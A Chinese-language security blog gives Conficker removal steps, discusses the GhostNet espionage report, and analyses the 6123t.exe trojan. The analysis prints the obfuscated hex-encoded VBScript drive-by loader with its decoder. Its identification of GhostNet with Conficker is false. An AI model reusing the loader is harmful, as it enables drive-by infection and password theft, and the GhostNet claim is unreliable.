如何移除Conflicker (DownAdup)病毒?

在前面文章已經報導過GhostNet病毒的威力, 這個病毒又稱Conflicker或Downadup, 其變種成多種不同型態的惡性病毒, 會竊取機密資料並遙控受害電腦, 萬一中毒應如何解除呢? 如果你的電腦無法連上各種防毒公司網站或Microsoft Update, 那就肯定中毒了, 以下是解毒方式: 先解除被斷線的問題 (1) 由開始->執行->輸入cmd 按Enter進到DOS模式 (2) 輸入指令 net stop dnscache , 按下Enter (3) 關閉DOS模式 這時應該已經可以連到防毒軟體公司 然後下載解毒軟體 http://www.symantec.com/content/en/us/global/removal_tool/threat_writeups/d.exe 關閉所有執行中的程式或視窗, 並確定你的電腦沒有自動回朔設定 執行解毒軟體 解完後會有報告產生 重新開機 更新Microsoft Patch MS08-067 (或整個Microsoft Update) 當然最後要把所有在該電腦用過的帳密都更改

GhostNet : 鬼網網路如何傳播與可能的影響

如上圖顯示亞洲地區已經成為GhostNet的最大溫床, 並且台灣已經是GhostNet的最大受害區域, 根據各方訊息尚無法證實是否中國政府與GhostNet有關 來自F-Secure的這份資料, 解釋了GhostNet如何散佈, 這份GhostNet Q&A也說明了一些常見的問題 如何成為GhostNet的目標? (1)收到造假的電子郵件, 並且來自信任的對象 (2)從電子郵件談論的內容無法判斷信件真假 (3)電子郵件會附上檔案(PDF/DOC/PPT/XLS) (4)檔案開啟也沒有發現任何異常 但是你已經被GhostNet植入木馬程式, 尤其政府單位或NGO最可能成為GhostNet的目標 其他Peer-to-Peer的方式亦可成為散佈的管道, 目前只有Windows使用者會受到GhostNet的影響, 並且電腦表面上不會有任何的異狀, 這個GhostNet病毒為Downadup/Conficker及其變種, 這個"Worm:W32/Downadup.DY"也有詳細資料 如何知道是否受到GhostNet的影響呢? 最簡單的方式是看你能不能連上一些掃毒網站, 如果都沒有問題就可能比較安全 如果發現無法連上某些知名掃毒站台, 你可以用另外電腦去F-Secure下載掃毒, 由於避免反而因掃毒而中獎, 這裡就不提供連結, 就請你的電腦廠商去處理 這個GhostNet不是愚人節的遊戲, 由於受害者多為政府單位, 可能會洩露許多敏感的資料, 進而威脅到政府運作, 因此必須正視這個問題 相關重要訊息 http://www.f-secure.com/weblog/archives/00001637.html http://isc.sans.org/diary.html http://www.f-secure.com/weblog/archives/00001636.html http://lastwatchdog.com/evolution-conficker-globe-spanning-worm/ 2009/03/31 補記: 如何保障不在此波GhostNet成為受害者? 這裡有幾項簡單作業 (1)如果你是windows用戶,請更新windows patch (2)設定windows為自動更新 (3)更新掃毒病毒碼 如果你的windows update原本為自動, 但莫名被改為取消或手動 如果你無法更新病毒碼, 就很可能是GhostNet(Downadup/Conficker)的對像 舉手之勞以保障電腦安全吧!

GhostNet : 台灣的網路正曝露在危險中

這則訊息是昨天由英國國家廣播的網頁得知, "Major cyber spy network uncovered", 但是目前在台灣的各媒體均未看到詳細報導 ... Yahoo!Kimo由紐約時報取得訊息"紐約時報：加拿大研究員發現大型電腦間諜網絡": （路透華盛頓28日電）「紐約時報」（New YorkTimes）今天報導，加拿大研究員發現一個龐大的電腦間諜作業系統，可以滲入全球政府和私人企業電腦竊取資料。被竊的對象包括達賴喇嘛的資料在內。 多倫多的蒙克國際研究中心 (Munk Center forInternational Studies)發現，過去兩年，全球至少有103個國家的1295台電腦被這套間諜系統入侵，研究團隊稱之為「鬼網」 (GhostNet)。 過去就曾發現電腦間諜行動的研究員說，各國大使館、外交部、政府機關以及達賴喇嘛位於印度、布魯塞爾、倫敦和紐約的流亡藏人中心，都是「鬼網」滲透的對象。 但是他們沒發現任何美國政府部門被「鬼網」入侵的證據。中央社（翻譯） 但是沒有說明最上圖的資料, 該圖的資料顯示台灣被感染148個主機, 為全球這波受害之冠, 再仔細閱讀內容, 以下為受害的例子 台灣史瓦濟蘭大使館 台灣資策會 台灣Net Trade 中華民國對外貿易發展協會 台灣TGSN政府網路 (資料來源 : Tracking GhostNet: Investigating a Cyber Espionage Network) 資料是由Information Warfare Monitor (IWM)經過十個月的研究所提出的報告, IWM是SecDev Group與Munk Centre for International Studies的研究學者組成 台灣的媒體報導說: "各國大使館、外交部、政府機關以及達賴喇嘛位於印度、布魯塞爾、倫敦和紐約的流亡藏人中心，都是「鬼網」滲透的對象...但是他們沒發現任何美國政府部門被「鬼網」入侵的證據" 該報導說 : "多倫多的蒙克國際研究中心 (Munk Center forInternational Studies)發現，過去兩年，全球至少有103個國家的1295台電腦被這套間諜系統入侵，研究團隊稱之為「鬼網」 (GhostNet)" 可是卻沒閱讀報告的內容, 台灣幾處重要的貿易及政府網路已經在GhostNet的嚴重侵害中... 後記 (2009/3/31) : http://news.pchome.com.tw/science/ithome/20090331/index-12384539272178952005.html 各網路訊息已經開始於今天陸續出現 但是卻有烏龍翻譯 以上來自ithome,pchome的訊息說 "該機構所條列出的電腦中，屬台灣的機構有：史瓦濟蘭大史館（高機密），資策會（III，低機密），Net Trade（高機密），外貿協會（高機密），以及政府服務網（高機密），其中單外貿協會就有79個。" 英文原文並非什麼高機密,低機密 而是指High/Medium/Low Confident...高度確定, 中度確定, 低度確定, 也就是指研究結果的信心指數(Confidence) 瓦濟蘭大史館（H）表示高度確定所偵測到的電腦是瓦濟蘭大史館所屬電腦 資策會（L）表示因為DNS解析下因為有些不確定因素 (例如資策會有多個domain, 但ip class可能同一個, 或domain為資策會所有, 但ip class非登記為資策會.....等不確定因素, 故不能高度確定是資策會所屬電腦, 如果由國內研究人員來判讀就知道是否為資策會所屬) 新聞翻譯成高機密,低機密...是有點離譜 如果立委拿這個去說...哇...高機密被偷啦....那會鬧笑話的 其實不管高/中/低度確定, 其實都一樣被感染了, 跟感染的嚴重性或被偷資料嚴重性都無關...都一樣嚴重 特此解釋, 希望不要以訛傳訛了

6123t.EXE病毒

近日瀏覽網頁時, 突然ZoneAlarm跳出一個視窗, 詢問是否執行6123t.exe? 當然當下馬上將此程式阻擋, 很難想像如果沒有防火牆的話, 不知又要造成什麼損失 ... 該檔案存在C:\目錄下 檔案名稱 : 6123t.exe 檔案大小 : 13840 byte 檔案類型 : MS-DOS executable (EXE), OS/2 or MS Windows 根據初步瞭解, 該檔案為木馬程式, 會偷取硬碟中的資料, 目前所有防毒軟體都沒有相關訊息, 似乎也都無法防堵, 現在中國大陸已經有多起中毒事件 如果您的電腦在C:\下存在6123t.exe, 而您沒有安裝額外防火牆的話, 就可能已經中毒了, 在尚未確認刪除以前, 就暫時拔掉網路線吧 ... (追蹤報導) 已經查出來源, 該病毒似乎與此次Flash出問題有關, 並且exe檔未必都是6123t Adobe Flash Player出現漏洞, 在Adobe釋出修補程式前，最好暫時關閉Flash外掛(或更新到最新版) 當網友瀏覽被入侵的網站時, 會執行以下javascript: Song = "3C536372697074204C616E67756167653D56425363726970743E0D0A094F6E204 572726F7220526573756D65204E6578740D0A09536574204F62203D20446F63756 D656E742E437265617465456C656D656E7428226F626A65637422290D0A094F622 E5365744174747269627574652022636C6173736964222C2022636C7369643A424 43936433535362D363541332D313144302D393833412D303043303446433239453 336220D0A0953657420506F70203D204F622E4372656174656F626A65637428224 1646F64622E53747265616D222C2222290D0A094966204E6F74204572722E4E756 D626572203D2030207468656E0D0A09094572722E636C6561720D0A0909446F637 56D656E742E77726974652028223C656D626564207372633D5C22666C6173682E7 377665C223E3C2F656D6265643E22290D0A0909446F63756D656E742E777269746 52028223C694672616D65207352633D7265616C2E68746D2077696474683D30206 865696768743D303E3C2F696672416D453E22290D0A0909446F63756D656E742E7 7726974652028223C694672616D65207352633D6E65772E68746D2077696474683 D30206865696768743D303E3C2F696672416D453E22290D0A09456C73650D0A090 9446F63756D656E742E77726974652028223C694672616D65207352633D68656C7 02E68746D2077696474683D30206865696768743D303E3C2F696672416D453E222 90D0A09456E642049660D0A3C2F5363726970743E" Function Hex2Str(ByVal Ans):For i = 1 To Len(Ans) Step 2:If IsNumeric(Mid(Ans, i, 1)) Then:tmpStr = tmpStr & Chr("&H" & Mid(Ans, i, 2)):Else:tmpStr = tmpStr & Chr("&H" & Mid(Ans, i, 4)):i = i + 2: End If: Next: Hex2Str = tmpStr: End Function Document.Write Hex2Str(Song) 這段經Hex2Str後解碼就不列出了, 它會執行 flash.swf real.htm new.htm help.htm 當啟動flash.swf, 會以URLMON.DLL去下載6123t.exe並執行, 執行後便會將卡巴斯基disable, 並解開ow.dll成為keyboard hook dll, 這個dll就可以監聽鍵盤的輸入, 因此該病毒應該是要偷取密碼 目前尚未中毒的電腦, 最好的方式就是先下載Adoble Flash到9.0.124版本, 並隨時注意Adobe新聞以更新flash的patch 由於被植入惡意程式的網站會越來越多, 預計災情會持續發燒